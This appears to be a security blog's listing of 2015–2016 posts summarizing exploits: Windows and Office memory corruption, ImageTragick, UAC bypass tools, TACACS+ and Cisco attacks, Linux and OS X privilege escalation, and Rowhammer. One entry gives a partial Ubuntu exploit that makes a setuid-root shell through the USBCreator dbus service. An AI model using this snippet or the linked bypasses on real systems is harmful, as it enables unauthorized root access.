admin
November 9, 2016
A memory corruption in the Microsoft Windows Animation Manager which allows a malicious user to remotely execute arbitrary code on a vulnerable user’s machine, in the context of the current user. JavaScript POC ::HERE::
admin
May 3, 2016
☑ Nickname
☑ Logo
☑ Hype
☑ Website
☐ POC
https://imagetragick.com/
ImageMagick reported today (CVE-2016–3714) allows image uploads to trick the ImageMagick software into running commands instead, leading to a remote code execution(RCE)bug. More info ::HERE::
admin
April 14, 2016
A new heap memory corruption (Out-of-Bounds Read) that affects Microsoft Office Excel 2007,2010,2013 and 2016. This vulnerability could allow remote code execution if a user opens a specially crafted Microsoft Office Excel file (.xlsm).
Advisory & POC
admin
April 10, 2016
The build brings new changes targeting previously exploited dll-hijacking and uac bypass method vulnerabilities.
cliconfg.exe – can no longer be used as target for autoelevation as MS changed it manifest to autoelevate=false.
mmc.exe – event viewer console fixed, dll hijacking no longer works.
fake IIS inetmgr...
admin
January 29, 2016
Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoors https://github.com/xsysvermin/BypassUAC
UPDATE: apparently was ripped from the original https://github.com/hfiref0x/UACME
admin
November 24, 2015
3 methods to get into Terminal Access Controller Access-Control System Plus (TACACS+) http://agrrrdog.blogspot.ca
Here’s some cisco rootkits too 🙂 exploit-db.com
admin
July 23, 2015
Two security vulnerabilities were found in the userhelper utility, (part of the usermode package) and the libuser library. Authenticated, local users with shell access could combine these vulnerabilities to achieve local privilege escalation to the root user, it lets users change /etc/passwd...
admin
July 22, 2015
OS X 10.10 DYLD_PRINT_TO_FILE Local Privilege Escalation Vulnerability: Affects OS X Yosemite v.10.10, the latest stable release, and the beta version 10.10.5 , so many people are affected by this. The flaw is the environment variable called DYLD_PRINT_TO_FILE that was added in Yosemite...
admin
April 23, 2015
On Ubuntu and need to escalate to root and don’t have sudo?
$ cat test.c
void __attribute__((constructor)) init (void)
{
chown(“/tmp/test”, 0, 0);
chmod(“/tmp/test”, 04755);
}
^D
$ gcc -shared -fPIC -o /tmp/test.so test.c
$ cp /bin/sh /tmp/test
$ dbus-send –print-reply –system –dest=com.ubuntu.USBCreator
/com/ubuntu/USBCreator com.ubuntu...
admin
March 9, 2015
“Rowhammer” is a problem with some recent DRAM devices in which repeatedly accessing a row of memory can cause bit flips in adjacent rows.
More info: Exploiting the DRAM rowhammer bug to gain kernel privileges
